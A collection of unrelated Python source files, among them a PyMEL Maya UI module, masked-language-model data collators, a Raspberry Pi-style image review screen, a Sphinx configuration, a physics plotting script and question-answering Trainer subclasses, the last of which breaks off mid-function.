newFunc = pymel.tools.py2mel.py2melProc(newFunc, procName=name, argTypes=['string'] * len(attrs))
if hasattr(replaceFunc, '__call__'):
name = self.__class__.__name__ + '_callCustom_replaceFunc_' + '_'.join(attrs)
replaceFunc = pymel.tools.py2mel.py2melProc(replaceFunc, procName=name, argTypes=['string'] * len(attrs))
args = (newFunc, replaceFunc) + attrs
cmds.editorTemplate(callCustom=1, *args)
def suppress(self, control):
cmds.editorTemplate(suppress=control)
def dimControl(self, nodeName, control, state):
#nodeName = nodeName if nodeName else self.nodeName
# print "dim", nodeName
cmds.editorTemplate(dimControl=(nodeName, control, state))
def beginLayout(self, name, collapse=True):
cmds.editorTemplate(beginLayout=name, collapse=collapse)
def endLayout(self):
cmds.editorTemplate(endLayout=True)
def beginScrollLayout(self):
cmds.editorTemplate(beginScrollLayout=True)
def endScrollLayout(self):
cmds.editorTemplate(endScrollLayout=True)
def beginNoOptimize(self):
cmds.editorTemplate(beginNoOptimize=True)
def endNoOptimize(self):
cmds.editorTemplate(endNoOptimize=True)
def interruptOptimize(self):
cmds.editorTemplate(interruptOptimize=True)
def addSeparator(self):
cmds.editorTemplate(addSeparator=True)
def addComponents(self):
cmds.editorTemplate(addComponents=True)
def addExtraControls(self, label=None):
kwargs = {}
if label:
kwargs['extraControlsLabel'] = label
cmds.editorTemplate(addExtraControls=True, **kwargs)
# TODO: listExtraAttributes
dynModule = _util.LazyLoadModule(__name__, globals())
def _createUIClasses():
for funcName in _factories.uiClassList:
# Create Class
classname = _util.capitalize(funcName)
try:
cls = dynModule[classname]
except KeyError:
if classname.endswith(('Layout', 'Grp')):
bases = (Layout,)
elif classname.endswith('Panel'):
bases = (Panel,)
else:
bases = (PyUI,)
dynModule[classname] = (_factories.MetaMayaUIWrapper, (classname, bases, {}))
_createUIClasses()
class MainProgressBar(dynModule.ProgressBar):
'''Context manager for main progress bar
If an exception occur after beginProgress() but before endProgress() maya
gui becomes unresponsive. Use this class to escape this behavior.
:Parameters:
minValue : int
Minimum or startingvalue of progress indicatior. If the progress
value is less than the minValue, the progress value will be set
to the minimum. Default value is 0
maxValue : int
The maximum or endingvalue of the progress indicator. If the
progress value is greater than the maxValue, the progress value
will be set to the maximum. Default value is 100.
interruptable : bool
Set to True if the isCancelled flag should respond to attempts to
cancel the operation. Setting this to true will put make the help
line display message to the user indicating that they can cancel
the operation.
Here's an example::
with MainProgressBar(0,20,True) as bar:
bar.setStatus('Calculating...')
for i in range(0,20):
bar.setProgress(i)
if bar.getIsCancelled():
break
'''
def __new__(cls, minValue=0, maxValue=100, interruptable=True):
from language import melGlobals
bar = dynModule.ProgressBar.__new__(
cls, melGlobals['gMainProgressBar'], create=False)
bar.setMinValue(minValue)
bar.setMaxValue(maxValue)
bar.setIsInterruptable(interruptable)
return bar
def __enter__(self):
self.beginProgress()
return self
def __exit__(self, *args):
self.endProgress()
class VectorFieldGrp(dynModule.FloatFieldGrp):
def __new__(cls, name=None, create=False, *args, **kwargs):
if create:
kwargs.pop('nf', None)
kwargs['numberOfFields'] = 3
name = cmds.floatFieldGrp(name, *args, **kwargs)
return dynModule.FloatFieldGrp.__new__(cls, name, create=False, *args, **kwargs)
def getVector(self):
import datatypes
x = cmds.floatFieldGrp(self, q=1, v1=True)
y = cmds.floatFieldGrp(self, q=1, v2=True)
z = cmds.floatFieldGrp(self, q=1, v3=True)
return datatypes.Vector([x, y, z])
def setVector(self, vec):
cmds.floatFieldGrp(self, e=1, v1=vec[0], v2=vec[1], v3=vec[2])
class PathButtonGrp(dynModule.TextFieldButtonGrp):
PROMPT_FUNCTION = 'promptForPath'
def __new__(cls, name=None, create=False, *args, **kwargs):
if create:
import windows
kwargs.pop('bl', None)
kwargs['buttonLabel'] = 'Browse'
kwargs.pop('bc', None)
kwargs.pop('buttonCommand', None)
name = cmds.textFieldButtonGrp(name, *args, **kwargs)
promptFunction = getattr(windows, cls.PROMPT_FUNCTION)
def setPathCB(name):
f = promptFunction()
if f:
cmds.textFieldButtonGrp(name, e=1, text=f, forceChangeCommand=True)
import windows
cb = windows.Callback(setPathCB, name)
cmds.textFieldButtonGrp(name, e=1, buttonCommand=cb)
return super(PathButtonGrp, cls).__new__(cls, name, create=False, *args, **kwargs)
def setPath(self, path, **kwargs):
kwargs['forceChangeCommand'] = kwargs.pop('fcc', kwargs.pop('forceChangeCommand', True))
self.setText(path, **kwargs)
def getPath(self):
import system
return system.Path(self.getText())
class FolderButtonGrp(PathButtonGrp):
PROMPT_FUNCTION = 'promptForFolder'
# most of the keys here are names that are only used in certain circumstances
_uiTypesToCommands = {
'radioCluster': 'radioCollection',
'rowGroupLayout': 'rowLayout',
'TcolorIndexSlider': 'rowLayout',
'TcolorSlider': 'rowLayout',
'floatingWindow': 'window',
'field': 'textField',
'staticText': 'text'
}
dynModule._lazyModule_update()
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import List, Dict, Optional, Tuple, Union, Any
import torch
from transformers import (
BatchEncoding,
PreTrainedTokenizerBase,
)
from transformers.data.data_collator import (
DataCollatorMixin,
_torch_collate_batch
)
from transformers.file_utils import PaddingStrategy
@dataclass
class DataCollatorForTargetedMasking(DataCollatorMixin):
"""
Data collator used for random masking of targeted classes of token.
Useful for learning language models based on masking part-of-speech tokens.
Instead of masking any random token as in MLM, only token that belong to a defined class are masked.
Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
mlm (`bool`, *optional*, defaults to `True`):
Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs
with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked
tokens and the value to predict for the masked token.
mlm_probability (`float`, *optional*, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
<Tip>
For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a
[`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`.
</Tip>"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 1.0
pad_to_multiple_of: Optional[int] = None
tf_experimental_compile: bool = False
return_tensors: str = "pt"
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
# In addition to input_ids, a feature 'tag_mask' needs to be provided to specify which token might be masked.
tag_mask = [example['tag_mask'] for example in examples] if 'tag_mask' in examples[0].keys() else None
if tag_mask is None:
raise ValueError(
"A mask should be provided to indicate which input token class to mask."
)
# pop tag_mask from examples before padding to avoid tokenizer being confused
# in case labels are provided by a token classification dataset, pop them too
for e in examples:
e.pop('tag_mask')
if 'labels' in e:
e.pop('labels')
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], (dict, BatchEncoding)):
batch = self.tokenizer.pad(examples, return_tensors="pt", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _torch_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# padding the mask (not handled by the tokenizer) to same uniform length as input_ids
sequence_length = len(batch["input_ids"][0])
padding_side = self.tokenizer.padding_side
if padding_side == "right":
tag_mask = [x + [0] * (sequence_length - len(x)) for x in tag_mask]
else:
tag_mask = [[0] * (sequence_length - len(x)) + x for x in tag_mask]
# tensorify the mask
tag_mask = torch.tensor(tag_mask, dtype=torch.uint8)
# input_ids are already tensors, see tokenizer return_tensors="pt"
batch["input_ids"], batch["labels"] = self.torch_tag_mask_tokens(batch["input_ids"], tag_mask)
return batch
def torch_tag_mask_tokens(self, inputs: torch.Tensor, mask: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Masks the input as specified by the tag mask prepared by the loader"""
targets = inputs.clone()
# create and initialize to zeros the probability matrix for masking
probability_matrix = torch.zeros_like(targets, dtype=torch.float64)
# update in-place probability to the set mlm_probability value where mask is true
probability_matrix.masked_fill_(mask.bool(), value=self.mlm_probability)
# use the probability at each position to randomly mask or not
masked_indices = torch.bernoulli(probability_matrix).bool()
# reolace input_ids by the mask token id at position that need to be masked
inputs[masked_indices] = self.tokenizer.mask_token_id
# we train to only predict the masked position
targets[~masked_indices] = -100 # We only compute loss on masked tokens
return inputs, targets
@dataclass
class DataCollatorForMaskedTokenClassification(DataCollatorMixin):
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer (:class:`~transformers.PreTrainedTokenizer` or :class:`~transformers.PreTrainedTokenizerFast`):
The tokenizer used for encoding the data.
padding (:obj:`bool`, :obj:`str` or :class:`~transformers.file_utils.PaddingStrategy`, `optional`, defaults to :obj:`True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
* :obj:`True` or :obj:`'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
* :obj:`'max_length'`: Pad to a maximum length specified with the argument :obj:`max_length` or to the
maximum acceptable input length for the model if that argument is not provided.
* :obj:`False` or :obj:`'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of
different lengths).
max_length (:obj:`int`, `optional`):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (:obj:`int`, `optional`):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (:obj:`int`, `optional`, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignore by PyTorch loss functions).
select_labels (bool, defaults to False):
Whether use only the labels at the masked position to calculate the loss
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
masking_probability: float = .0
replacement_probability: float = .0
select_labels: bool = False
def torch_call(self, features) -> Dict[str, torch.Tensor]:
"""
In addition to input_ids, a feature 'tag_mask' needs to be provided to specify which token might be masked.
"""
if 'tag_mask' in features[0].keys():
tag_mask = [feature['tag_mask'] for feature in features]
else:
raise ValueError("A mask should be provided to indicate which input token class to mask.")
label_name = "label" if "label" in features[0].keys() else "labels"
if label_name in features[0].keys():
labels = [feature[label_name] for feature in features]
else:
raise ValueError("A feature 'label' or 'labels' should be provided for token classification")
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of
)
# batch['input_ids'] are now padded
# we still need to 'manually' pad the labels and the tag mask
sequence_length = len(batch["input_ids"][0])
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["tag_mask"] = [x + [0] * (sequence_length - len(x)) for x in tag_mask]
batch["labels"] = [x + [self.label_pad_token_id] * (sequence_length - len(x)) for x in labels]
else:
batch["tag_mask"] = [[0] * (sequence_length - len(x)) + x for x in tag_mask]
batch["labels"] = [[self.label_pad_token_id] * (sequence_length - len(x)) + x for x in labels]
# convert dict of list of lists into ditc of tensors
batch = {k: torch.tensor(v, dtype=torch.int64) for k, v in batch.items()}
# stochastically mask input ids according to tag_mask
batch["input_ids"], batch["labels"] = self.tag_mask_tokens(batch["input_ids"], batch["labels"], batch["tag_mask"])
# remove tak_mask from match as it would be rejected by model.forward()
batch.pop("tag_mask")
return batch
def tag_mask_tokens(self, inputs: torch.Tensor, targets: torch.Tensor, mask: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Masks the input as specified by the tag mask prepared by the loader"""
inputs = inputs.clone() # not sure if necessary; might be safer to avoid changing input features when provided as tensor
if self.select_labels:
targets = targets.clone()
# create the probability matrix for masking
masking_probability_matrix = torch.full(inputs.size(), self.masking_probability)
# use the probability matrix to draw whether to replace or not and intersect with the mask
masked_indices = torch.bernoulli(masking_probability_matrix).bool() & mask.bool()
# replace input_ids by the mask token id at position that need to be masked
inputs[masked_indices] = self.tokenizer.mask_token_id
# second probability matrix is to determin whether to randomize remaining marked tokens
replacement_probability_matrix = torch.full(inputs.size(), self.replacement_probability)
# indices of token to replace found by drawing from prob matric and intersecting with mask but exclusin alreayd masked positions
replaced_indices = torch.bernoulli(replacement_probability_matrix).bool() & mask.bool() & ~masked_indices
# draw random int from vocab size of tokenizer and fill tenzoer of shape like intput
random_input_ids = torch.randint(len(self.tokenizer), inputs.size(), dtype=torch.long)
# at the replacmenet indices, change to random token
inputs[replaced_indices] = random_input_ids[replaced_indices]
if self.select_labels:
# only labels at the makred position (irrespective of whether they are masked) will be used for calculating the loss
targets[~mask] = -100
return inputs, targets
@dataclass
class MyDataCollatorForSeq2Seq:
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
model ([`PreTrainedModel`]):
The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to
prepare the *decoder_input_ids*
This is useful when using *label_smoothing* to avoid calculating loss twice.
padding (`bool`, `str` or [`~file_utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of
different lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
model: Optional[Any] = None
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def __call__(self, features, return_tensors=None):
import numpy as np
if return_tensors is None:
return_tensors = self.return_tensors
labels = [feature["labels"] for feature in features] if "labels" in features[0].keys() else None
# We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the
# same length to return tensors.
if labels is not None:
max_label_length = max(len(l) for l in labels)
if self.pad_to_multiple_of is not None:
max_label_length = (
(max_label_length + self.pad_to_multiple_of - 1)
// self.pad_to_multiple_of
* self.pad_to_multiple_of
)
if self.max_length is not None:
assert max_label_length <= self.max_length, f"{max_label_length} > {self.max_length}"
padding_side = self.tokenizer.padding_side
for feature in features:
remainder = [self.label_pad_token_id] * (max_label_length - len(feature["labels"]))
if isinstance(feature["labels"], list):
feature["labels"] = (
feature["labels"] + remainder if padding_side == "right" else remainder + feature["labels"]
)
elif padding_side == "right":
feature["labels"] = np.concatenate([feature["labels"], remainder]).astype(np.int64)
else:
feature["labels"] = np.concatenate([remainder, feature["labels"]]).astype(np.int64)
features = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=return_tensors,
)
# prepare decoder_input_ids
if self.model is not None and hasattr(self.model, "prepare_decoder_input_ids_from_labels"):
decoder_input_ids = self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])
features["decoder_input_ids"] = decoder_input_ids
return features |
from display import show
from pathlib import Path
from PIL import Image, ImageDraw, ImageFont
def get_images():
return sorted(list(Path('out').glob('*.jpg')))
w = 480
h = 320
delete_button_coords = [
int(w / 3),
int(h / 6 * 5),
int(w / 3 * 2),
int(h-2),
]
class Review:
i = 0
image_len = 0
confirm = False
image_list = []
def __init__(self):
self.image_list = get_images()
self.image_len = len(self.image_list)
self.i = self.image_len - 1
self.refresh()
def press(self, x, y):
if self.image_len == 0:
return
elif x >= delete_button_coords[0] and x <= delete_button_coords[2] and y >= delete_button_coords[1] and y <= delete_button_coords[3]:
if not self.confirm:
self.confirm = True
self.refresh()
else:
self.delete()
self.confirm = False
self.refresh()
elif x < w / 2:
self.nav(-1)
self.confirm = False
else:
self.nav(1)
self.confirm = False
def nav(self, n):
self.i = (self.i + n) % self.image_len
self.refresh()
def delete(self):
self.image_list[self.i].unlink()
self.image_list = get_images()
self.image_len = len(self.image_list)
if self.i > len(self.image_list) - 1:
self.i -= 1
def refresh(self):
fnt = ImageFont.truetype("Roboto-Thin.ttf", 26)
if self.image_len == 0:
image = Image.new('RGB', (w, h))
draw = ImageDraw.Draw(image)
draw.rectangle((0,0,w-1, h-1), outline=(255,255,255), fill=(0,0,0))
txt = 'No Images!'
txtw, txth = draw.textsize(txt,font=fnt)
draw.text((
w / 2 - txtw / 2,
h / 2 - txth / 2
), txt,font=fnt, fill=(255,255,255))
else:
image = Image.open(str(self.image_list[self.i]))
image = image.resize((480,320), Image.NEAREST)
draw = ImageDraw.Draw(image)
draw.rectangle((0,0,image.size[0]-1, image.size[1]-1), outline=(255,255,255))
txt = '{}/{}'.format(self.i+1, self.image_len)
txtw, txth = draw.textsize(txt,font=fnt)
draw.rectangle((1,1,txtw+1,txth+1), fill=(0,0,0))
draw.text((1,1), txt,font=fnt, fill=(255,255,255))
txt = 'Confirm' if self.confirm else 'Delete'
txtw, txth = draw.textsize(txt,font=fnt)
draw.rectangle(delete_button_coords, fill=(0,0,0), outline=(255,255,255))
draw.text((
(delete_button_coords[2] + delete_button_coords[0]) / 2 - txtw / 2,
(delete_button_coords[3] + delete_button_coords[1]) / 2 - txth / 2
), txt,font=fnt, fill=(255,255,255))
show(image)
|
def IsPointInSquare(x, y):
return abs(x) <= 1 and abs(y) <= 1
x = float(input())
y = float(input())
if IsPointInSquare(x, y) is True:
print('YES')
else:
print('NO')
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
import datetime as dt
import json
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from pathlib import Path
import gobbli
file_loc = os.path.split(__file__)[0]
sys.path.insert(0, os.path.join(os.path.dirname(file_loc), "."))
# -- Project information -----------------------------------------------------
with open(os.path.join(file_loc, "..", "meta.json"), "r") as f:
meta = json.load(f)
project = meta["name"]
author = meta["author"]
copyright = f"{dt.date.today().year}, {author}"
# The full version, including alpha/beta/rc tags
version = meta["version"]
release = version
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.coverage",
"sphinx.ext.viewcode",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.napoleon",
"sphinx_autodoc_typehints",
"sphinx_paramlinks",
]
autodoc_default_options = {
"members": None,
"inherited-members": None,
"show-inheritance": None,
}
autoclass_content = "both"
autosummary_generate = True
intersphinx_mapping = {
"docker": ("https://docker-py.readthedocs.io/en/stable/", None),
"ray": ("https://ray.readthedocs.io/en/stable/", None),
"sklearn": ("https://scikit-learn.org/stable", None),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "alabaster"
html_theme_options = {
"description": "Deep learning with text doesn't have to be scary",
"logo": "gobbli_lg.svg",
"touch_icon": "gobbli_app.svg",
"github_banner": "true",
"github_button": "true",
"github_repo": "gobbli",
"github_user": "RTIInternational",
"page_width": "1040px",
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
html_sidebars = {
"**": ["about.html", "navigation.html", "relations.html", "searchbox.html"]
}
html_favicon = os.path.join("_static", "gobbli_favicon.ico")
html_title = f"gobbli {version} documentation"
# Autogenerate API docs
def run_apidoc(_):
from sphinx.ext.apidoc import main
# Repository root
base_dir = Path(__file__).parent.parent.resolve()
output_path = base_dir / "docs" / "auto"
main(
[
"--no-toc",
"--separate",
"-o",
str(output_path),
str(base_dir / project),
str(base_dir / project / "model" / "*" / "src"),
]
)
def setup(app):
app.connect("builder-inited", run_apidoc)
|
from crypto.transactions.serializers.base import BaseSerializer
class DelegateResignationSerializer(BaseSerializer):
"""Serializer handling delegate resignation data
"""
def serialize(self):
return self.bytes_data
|
"""This keeps track of any context needed for auto-completions and expression evaluations
This therefore carries """
# Copyright (c) 2019 Seven Bridges. See LICENSE
from typing import List
from dataclasses import dataclass
from .intelligence import IntelligenceNode
from .workflow import Workflow, WFStepIntelligence
@dataclass
class IntelligenceContext:
path: List[str] = None
workflow: Workflow = None
workflow_step_intelligence: WFStepIntelligence = None
requirements: IntelligenceNode = None
def copy_context(old: IntelligenceContext) -> IntelligenceContext:
return IntelligenceContext(
path=list(old.path),
workflow=old.workflow,
workflow_step_intelligence=old.workflow_step_intelligence,
requirements=old.requirements)
|
#!/usr/bin/env python3
import argparse
import numpy as np
import pandas as pd
#import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import colors
from matplotlib import rc
rc('font', **{'family': 'serif', 'serif': ['Palatino']})
rc('text', usetex=True)
rc('legend', **{'fontsize': 13})
#sns.set(style="white")
np.set_printoptions(precision=2, linewidth=500, suppress=True)
parser = argparse.ArgumentParser("Quantum unfolding plotter")
parser.add_argument('-o', '--observable', default='peak')
parser.add_argument('-e', '--encoding', default=4)
args = parser.parse_args()
nbits = int(args.encoding)
obs = args.observable
known_methods = [
'qpu_hinoise_reg0',
'qpu_lonoise_reg0',
# 'qpu_lonoise_reg0_gamma0',
# 'qpu_lonoise_reg0_gamma1',
# 'qpu_lonoise_reg0_gamma0_48bits',
]
n_methods = len(known_methods)
labels = {
'qpu_hinoise_reg0':
"QPU, regular noise",
'qpu_lonoise_reg0':
"QPU, lower noise",
'qpu_lonoise_reg0_gamma0':
"QPU, lower noise, $\gamma$=0",
'qpu_lonoise_reg0_gamma1':
"QPU, lower noise, $\gamma$=1",
'qpu_lonoise_reg0_gamma0_48bits':
"QPU, lower noise, $\gamma$=0, encoding=(4,8)"
}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def FromFile(csv_file):
data = np.genfromtxt(csv_file, delimiter=',')
return {
'mean': np.mean(data, axis=0),
'rms': np.std(data, axis=0),
'corr': np.corrcoef(data, rowvar=False),
}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
unfolded_data = {
'qpu_hinoise_reg0':
FromFile(f"csv/results.obs_{obs}.qpu_hinoise.reg_0.4bits.csv"),
'qpu_lonoise_reg0':
FromFile(f"csv/results.obs_{obs}.qpu_lonoise.reg_0.4bits.csv"),
'qpu_lonoise_reg0_gamma0':
FromFile(
f"csv/results_syst.obs_{obs}.qpu_lonoise.reg_0.gamma_0.4bits.csv"),
'qpu_lonoise_reg0_gamma1':
FromFile(
f"csv/results_syst.obs_{obs}.qpu_lonoise.reg_0.gamma_1.4bits.csv"),
'qpu_lonoise_reg0_gamma0_48bits':
FromFile(
f"csv/results_syst.obs_{obs}.qpu_lonoise.reg_0.gamma_0.48bits.csv"),
}
Nbins = 5
Nsyst = 2
#f, ax = plt.subplots(figsize=(11, 9))
for method in known_methods:
print("INFO: correlation matrix for method", method)
corr = unfolded_data[method]['corr']
#mask = np.zeros_like(corr, dtype=np.bool)
#mask[np.triu_indices_from(mask)] = True
print(unfolded_data[method]['corr'])
Nparams = Nbins
names = ["bin1", "bin2", "bin3", "bin4", "bin5"]
if "gamma" in method:
Nparams += Nsyst
names += ["norm", "shape"]
f = plt.figure()
ax = f.add_subplot()
cax = ax.imshow(corr, cmap=plt.cm.get_cmap('bwr'), vmin=-1, vmax=1)
f.colorbar(cax)
#plt.title( labels[method])
ax.set_xlim(-0.5, Nparams - 0.5)
ax.set_ylim(-0.5, Nparams - 0.5)
ticks = np.arange(Nparams)
ax.set_xticks(ticks)
ax.set_yticks(ticks)
ax.set_xticklabels(names)
ax.set_yticklabels(names)
plt.xticks(rotation=45)
plt.show()
f.savefig(f"correlations_{obs}_{nbits}bits_syst_{method}.pdf")
|
#!/usr/bin/env python
import json
import os
import sys
try:
from fwd_api.devices_response import DevicesResponse, DeviceResponse
except:
print('Error importing from fwd_api. Check that you ran ' +
'setup (see README).')
sys.exit(-1)
DEVICES_JSON = os.path.join(os.path.dirname(__file__),
'..', 'fwd-api-data', 'devices',
'example.json')
# We know a priori that the json in DEVICES_JSON should deserialize
# into the following device responses.
EXPECTED_DEVICES = [
DeviceResponse('veos-0', 1),
DeviceResponse('veos-1', 2),
]
def test_deserialization():
with open(DEVICES_JSON) as fd:
json_list = json.loads(fd.read())
devices_response = DevicesResponse.from_json(json_list)
device_response_list = devices_response.get_device_response_list()
# Ensure that parsed responses equal expected responses
assert device_response_list == EXPECTED_DEVICES
if __name__ == '__main__':
test_deserialization()
|
from typing import Dict, List, Optional, Union, Any, Tuple
from torch import nn
import numpy as np
from torch.nn.modules import module
from transformers import Trainer, AutoConfig
from transformers.trainer_utils import (
EvalLoopOutput,
PredictionOutput,
EvalPrediction,
speed_metrics,
denumpify_detensorize,
)
from datasets.load import load_metric
from datasets import Dataset
from processor import DataProcessor
from model import (
RobertaForSequenceClassification,
RobertaForQuestionAnsweringAVPool,
RobertaCNNForQuestionAnsweringAVPool,
)
import collections
import time
import math
from tqdm import tqdm
import os
import json
from sklearn.metrics import f1_score, accuracy_score
from copy import copy
class SketchReader(Trainer):
def __init__(self, *args, eval_examples=None, **kwargs):
super().__init__(*args, **kwargs)
self.eval_examples = eval_examples
def post_process_function(
self,
output: Union[np.ndarray, EvalLoopOutput],
eval_examples: Dataset,
eval_dataset: Dataset,
mode="predict",
):
if isinstance(output, EvalLoopOutput):
logits = output.predictions
else:
logits = output
example_id_to_index = {k: i for i, k in enumerate(eval_examples["guid"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(eval_dataset):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
count_map = {k: len(v) for k, v in features_per_example.items()}
logits_ans = np.zeros(len(count_map))
logits_na = np.zeros(len(count_map))
for example_index, example in enumerate(tqdm(eval_examples)):
feature_indices = features_per_example[example_index]
n_strides = count_map[example_index]
logits_ans[example_index] += logits[example_index, 0] / n_strides
logits_na[example_index] += logits[example_index, 1] / n_strides
# Calculate E-FV score
score_ext = logits_ans - logits_na
# Save external front verification score
final_map = dict(zip(eval_examples["guid"], score_ext.tolist()))
with open(os.path.join(self.args.output_dir, "cls_score.json"), "w") as writer:
writer.write(json.dumps(final_map, indent=4) + "\n")
if mode == "evaluate":
return EvalPrediction(
predictions=logits,
label_ids=output.label_ids,
)
else:
return final_map
def predict(
self,
eval_dataset: Optional[Dataset] = None,
eval_examples: Optional[Dataset] = None,
ignore_keys: Optional[List[str]] = None,
metric_key_prefix: str = "predict",
) -> Dict[str, float]:
self._memory_tracker.start()
eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
eval_examples = self.eval_examples if eval_examples is None else eval_examples
start_time = time.time()
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
output = eval_loop(
eval_dataloader,
description="Prediction",
# No point gathering the predictions if there are no metrics, otherwise we defer to
# self.args.prediction_loss_only
# prediction_loss_only=True if self.compute_metrics is None else None,
ignore_keys=ignore_keys,
# metric_key_prefix=metric_key_prefix,
)
eval_preds = self.post_process_function(
eval_examples=eval_examples, eval_dataset=eval_dataset, output=output
)
class IntensiveReader(Trainer):
def __init__(self, *args, eval_examples=None, data_args=None, **kwargs):
super().__init__(*args, **kwargs)
self.eval_examples = eval_examples
self.data_args = data_args
def post_process_function(
self,
output: Union[np.ndarray, EvalLoopOutput],
eval_examples: Dataset,
eval_dataset: Dataset,
mode="predict",
) -> Union[List[Dict[str, Any]], EvalPrediction]:
# print(output)
predictions, _, _, scores_diff_json = self.compute_predictions(
eval_examples,
eval_dataset,
output.predictions,
version_2_with_negative=self.data_args.version_2_with_negative,
n_best_size=self.data_args.n_best_size,
max_answer_length=self.data_args.max_answer_length,
null_score_diff_threshold=self.data_args.null_score_diff_threshold,
output_dir=self.args.output_dir,
)
# Format the result to the format the metric expects.
formatted_predictions = [
{"id": k, "prediction_text": v, "no_answer_probability": scores_diff_json[k]}
for k, v in predictions.items()
]
if mode == "predict":
return formatted_predictions
else:
references = [{"id": ex["guid"], "answers": ex["answers"]} for ex in eval_examples]
return EvalPrediction(predictions=formatted_predictions, label_ids=references)
def compute_predictions(
self,
examples: Dataset,
features: Dataset,
predictions: Tuple[np.ndarray, np.ndarray],
version_2_with_negative: bool = False,
n_best_size: int = 20,
max_answer_length: int = 30,
null_score_diff_threshold: float = 0.0,
